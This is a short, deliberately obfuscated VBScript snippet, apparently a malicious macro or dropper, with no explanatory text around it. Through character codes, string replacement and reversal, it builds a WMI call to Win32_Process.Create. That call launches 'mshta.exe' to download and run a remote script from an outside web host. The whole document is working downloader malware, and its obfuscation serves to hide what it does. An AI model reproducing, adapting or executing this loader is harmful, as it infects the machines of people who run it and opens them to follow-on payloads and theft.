FJSYBUPDNIKTXBLROXEHKA = Replace(":IGBGIKWXSNZXJLZRAVDPQV"&chr(77)&""&chr(71)&"","IGBGIKWXSNZXJLZRAVDPQV",""&chr(83)&""&chr(84)&"")
KPQTOUSLJRGGCEIJZWZRJU = Replace(""&chr(80)&"WBLQRWGLDITNAHTKHQPALV"&chr(78)&""&chr(73)&"","WBLQRWGLDITNAHTKHQPALV","_"&chr(50)&""&chr(51)&"")
VOTTCTDLTZWCQOYZBENGZI = StrReverse("c"&chr(69)&""&chr(83)&"")
GUEICXWWAIUYKDNRPJZENX = ""&chr(83)&""+VOTTCTDLTZWCQOYZBENGZI+""&chr(79)&""
HQWNIQESTVKGZBEGIXOEWA = ""&chr(78)&""+""&chr(73)&""+""&chr(87)&""
FXCHZXSKXSOZSEYCHQBQRO = Replace(""&chr(88)&"EKFNAAORXKHPJQRIINYIIJ"&chr(72)&""&chr(83)&"","EKFNAAORXKHPJQRIINYIIJ",""&chr(69)&""&chr(46)&""&chr(65)&""&chr(84)&"")

UNYQOKUOTQGUWQDSXVUCBK = StrReverse("txt" & Chr(46) & "1cne" & Chr(47) & "kp" & Chr(46) & "moc" & Chr(46) & "urugedart" & Chr(47) & "" & Chr(47) & ":ptth "&chr(69)&""+FXCHZXSKXSOZSEYCHQBQRO+""&chr(77)&"")
set QVSNZZZSWKUQFVCNJZSPSA = GetObject(StrReverse(""+GUEICXWWAIUYKDNRPJZENX+""&chr(82)&""+KPQTOUSLJRGGCEIJZWZRJU+""&chr(87)&""+FJSYBUPDNIKTXBLROXEHKA+""&chr(77)&""+HQWNIQESTVKGZBEGIXOEWA+""))

YEYEEHKEKYXZNIOODKGKNR = QVSNZZZSWKUQFVCNJZSPSA.Create (UNYQOKUOTQGUWQDSXVUCBK,null,null,processid)